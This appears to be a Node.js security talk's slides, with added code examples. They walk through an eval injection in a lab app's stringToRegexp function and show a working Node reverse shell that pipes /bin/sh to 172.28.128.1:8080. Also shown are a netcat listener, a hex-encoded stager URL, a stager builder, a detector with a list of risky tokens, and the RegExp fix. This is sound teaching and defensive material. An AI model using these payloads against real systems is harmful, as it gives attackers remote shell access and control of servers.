node js reverse shell
NODE JS SECURITY VULNERABILITIES
ABOUT ME
Madhu Akula - Automation Security Ninja at Appsecco
Interested in Security & DevOps
Never ending learner!
@madhuakula
WHAT IS NODE JS?
Node.js is an open-source, cross-platform runtime environment for developing server-side Web applications.
Although Node.js is not a JavaScript framework, many of its basic modules are written in JavaScript, and developers can write new modules in JavaScript. The runtime environment interprets JavaScript using Google's V8 JavaScript engine.
(Wikipedia)
HELLO WORLD HTTP SERVER IN NODE JS
var http = require('http');
var server = http.createServer(function (req, res) {
  res.writeHead(200);
  res.end('Hello World');
});
server.listen(2000);
WHY NODE JS SECURITY?
A lot of applications are moving to JavaScript, especially with the MEAN (Mongo-Express-Angular-Node) stack.
HOW TO TEST NODE JS SECURITY?
It's similar to normal web application security testing, with additional checks for JavaScript-specific vulnerabilities.
DEMO TIME
REVERSE SHELL ON A NODE.JS APPLICATION BY @WIREMASK
POC SETUP
VULNERABLE NODE JS CODE
'use strict';
const http = require('http');
const url = require('url');
const path = require('path');

const animalsJSON = path.join(__dirname, 'animals.json');
const animals = require(animalsJSON);

function requestHandler(req, res) {
  let urlParams = url.parse(req.url, true);
  let queryData = urlParams.query;
  res.writeHead(200, { "Content-Type": "application/json" });
  // The slide stops here. The handler goes on to build a RegExp from
  // queryData.name with stringToRegexp() and to pick the matching entries
  // out of `animals` (see IDENTIFICATION below).
}

http.createServer(requestHandler).listen(3000);
ACCESS THE APPLICATION
http://localhost:3000/?name=do*
IDENTIFICATION
The stringToRegexp function is evaluating user input to create a RegExp object and uses it to find elements in an array.
return eval(prefix + output + suffix); // we control output value
We can insert our own JavaScript code in the output variable and execute it. The stringToRegexp function will escape some characters, and the output value will then be evaluated. In the payload below, the leading ./; closes the regular-expression literal the function is building and ends that statement, the JavaScript in the middle runs as ordinary code, and the trailing //* comments out whatever suffix the function appends:
http://localhost:3000/?name=["./;require('util').log('Owned');//*"]
EXPLOIT
(function () {
  var net = require("net"),
      cp = require("child_process"),
      sh = cp.spawn("/bin/sh", []);
  var client = new net.Socket();
  // attacker's listener (see START NETCAT LISTENER below)
  client.connect(8080, "172.28.128.1", function () {
    client.pipe(sh.stdin);      // what we type goes to the shell
    sh.stdout.pipe(client);     // shell output comes back over the socket
    sh.stderr.pipe(client);
  });
  return /a/; // hand a RegExp back so the eval() in stringToRegexp still gets one
})();
START NETCAT LISTENER
nc -lvp 8080
SAMPLE URL
http://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"]
PAYLOAD is the hex-encoded reverse shell from the EXPLOIT slide. new Buffer() is deprecated in current Node.js releases; Buffer.from('PAYLOAD', 'hex') is the equivalent.
HEX PAYLOAD CREATION USING PYTHON
>>> payload = 'nodejs reverse shell JavaScript code'
>>> payload.encode('hex')
(This is Python 2; str.encode('hex') does not exist in Python 3, where the equivalent is payload.encode().hex().)
FINAL URL WITH PAYLOAD
http://localhost:3000/?name=["./;eval(new Buffer('2866756e6374696f6e28297b20766172206e6574203d207265717569726528226e657422292c206370203d207265717569726528226368696c645f70726f6365737322292c207368203d2063702e737061776e28222f62696e2f7368222c205b5d293b2076617220636c69656e74203d206e6577206e65742e536f636b657428293b20636c69656e742e636f6e6e65637428383038302c20223137322e32382e3132382e31222c2066756e6374696f6e28297b20636c69656e742e706970652873682e737464696e293b2073682e7374646f75742e7069706528636c69656e74293b2073682e7374646572722e7069706528636c69656e74293b207d293b2072657475726e202f612f3b207d2928293b', 'hex').toString());//*"]
CHECK YOUR NETCAT LISTENER
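The stager construction from the SAMPLE URL, HEX PAYLOAD and FINAL URL steps, and the defender's reverse of it, as an added example written in Node rather than code from the slides or from @wiremask's PoC. EXPLOIT_JS is the reverse shell the FINAL URL slide encodes (decoded from its hex); the base URL http://localhost:3000, the 32-digit threshold for what counts as a hex blob and the list of risky tokens are assumptions made for this example.

```javascript
'use strict';
// Added example, not code from the slides or from @wiremask's PoC. It does
// the stager construction the slides do in Python 2 (payload.encode('hex'))
// in Node, and the reverse operation a defender wants: pull long hex runs
// out of a request URL, decode them and flag Node APIs that hand over code
// execution. Base URL, hex-run threshold and token list are assumptions.

// Reverse-shell source exactly as encoded on the "FINAL URL WITH PAYLOAD"
// slide (listener 172.28.128.1:8080, as on the netcat slide).
const EXPLOIT_JS =
  '(function(){ var net = require("net"), cp = require("child_process"), ' +
  'sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); ' +
  'client.connect(8080, "172.28.128.1", function(){ client.pipe(sh.stdin); ' +
  'sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();';

// Python 2's payload.encode('hex'), in Node. Buffer.from() replaces the
// deprecated new Buffer() the slides use.
function toHex(js) {
  return Buffer.from(js, 'utf8').toString('hex');
}

// The ?name= value from the slides, with the JS hidden in a hex string so no
// quote or slash from the payload has to survive the function's escaping.
function buildStagerUrl(base, js) {
  const name = `["./;eval(Buffer.from('${toHex(js)}', 'hex').toString());//*"]`;
  return `${base}/?name=${encodeURIComponent(name)}`;
}

// Strings whose presence in decoded input is worth an alert (assumed list).
const RISKY_TOKENS = ['child_process', 'require(', 'net.Socket', 'spawn(', 'exec(', '/bin/sh'];

// Defender side: works on a full URL or on the bare req.url path a web server
// logs. Reports whether eval( appears in the query and, for every hex run of
// 32+ digits, the decoded text and the risky tokens found in it.
function inspectRequestUrl(requestUrl) {
  const search = new URL(requestUrl, 'http://localhost').search;
  let query;
  try {
    query = decodeURIComponent(search);
  } catch (e) {
    query = search; // malformed %-escapes: inspect the raw form instead
  }
  const findings = [];
  for (const hex of query.match(/[0-9a-fA-F]{32,}/g) || []) {
    if (hex.length % 2 !== 0) continue; // odd length: not a byte string
    const decoded = Buffer.from(hex, 'hex').toString('utf8');
    findings.push({ decoded, hits: RISKY_TOKENS.filter((t) => decoded.includes(t)) });
  }
  return { usesEval: /\beval\s*\(/.test(query), findings };
}

// Stand-alone demo: build the stager, then inspect it as a defender would.
const demoUrl = buildStagerUrl('http://localhost:3000', EXPLOIT_JS);
console.log(inspectRequestUrl(demoUrl).findings[0].hits);
```

toHex(EXPLOIT_JS) reproduces the hex string on the FINAL URL slide byte for byte, so the same function run the other way (inspectRequestUrl) on a logged request turns the opaque blob back into the reverse shell and names the primitives it uses.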
CONCLUSION
It's highly recommended to avoid using the eval function in a JavaScript project. The fix was rather simple: they started using the RegExp object directly.
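The eval-based stringToRegexp next to the fix described above, as an added example. This is a hypothetical reconstruction that reproduces the behaviour the slides describe, not the vulnerable app's or @wiremask's code: the prefix and suffix of '/', the rewriting of '*' to '.*', the animal list and the benign payload (a global flag instead of require('util').log('Owned')) are assumptions, and the function takes the bare string where the slides' URL wraps it in a JSON array.

```javascript
'use strict';
// Added example, not the vulnerable app's or the slides' code: a hypothetical
// stringToRegexp() that builds a regex literal with eval(), beside the fix the
// conclusion describes (using RegExp directly). Prefix/suffix '/', the '*'
// rewrite, the animal list and the payload are assumptions for illustration.
const animals = ['dog', 'dolphin', 'cat', 'donkey']; // constructed sample data

// Vulnerable: user input ends up inside source text handed to eval().
function vulnerableStringToRegexp(input) {
  // only '*' is rewritten here; the slides say the original escapes more
  const output = String(input).replace(/\*/g, '.*');
  const prefix = '/';
  const suffix = '/';
  // 'do*' becomes '/do.*/', a regex literal. './;<js>;//*' becomes
  // '/./;<js>;//.*/': a regex literal, then a statement the attacker chose,
  // then a line comment that swallows the suffix.
  return eval(prefix + output + suffix); // we control output value
}

// Fixed: build the pattern with the RegExp constructor and escape every
// metacharacter first, so the input can only ever be pattern text.
function safeStringToRegexp(input) {
  const escaped = String(input).replace(/[.+?^${}()|[\]\\\/]/g, '\\$&');
  // '*' keeps its wildcard meaning, as in the slides' ?name=do*
  return new RegExp('^' + escaped.replace(/\*/g, '.*') + '$');
}

// The lookup the handler performs with whichever converter it was given.
function findAnimals(toRegexp, name) {
  const re = toRegexp(name);
  return animals.filter((a) => re.test(a));
}

// Benign stand-in for the slides' require('util').log('Owned'): set a flag.
// Same shape as the slides' payload: './;' + statement + '//*'.
const PAYLOAD = "./;globalThis.__evalDemo = 'executed';//*";

// Stand-alone demo (the safe path only; the vulnerable path with PAYLOAD
// would run the injected statement).
console.log(findAnimals(safeStringToRegexp, 'do*')); // [ 'dog', 'dolphin', 'donkey' ]
console.log(safeStringToRegexp(PAYLOAD).source);     // escaped pattern text, nothing executed
```

Calling vulnerableStringToRegexp(PAYLOAD) sets globalThis.__evalDemo, which is the same code-execution primitive the slides turn into a reverse shell; safeStringToRegexp(PAYLOAD) returns a RegExp that matches the literal payload text and nothing else, and the wildcard lookup ?name=do* keeps working under both versions.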
WANT TO TRY IT YOURSELF?
https://github.com/appsecco/vulnerable-apps
docker run -p 3000:3000 -d appsecco/nodereverseshell
PLAYGROUND FOR NODEJS VULNERABILITIES
DAMN VULNERABLE NODE APPLICATION
Ansible Playbook & Docker
NODE JS SECURITY REFERENCES
https://www.npmjs.com/package/helmet
https://blog.risingstack.com/node-js-security-checklist/
https://nodesecurity.io/resources
https://groups.google.com/forum/#!forum/nodejs-sec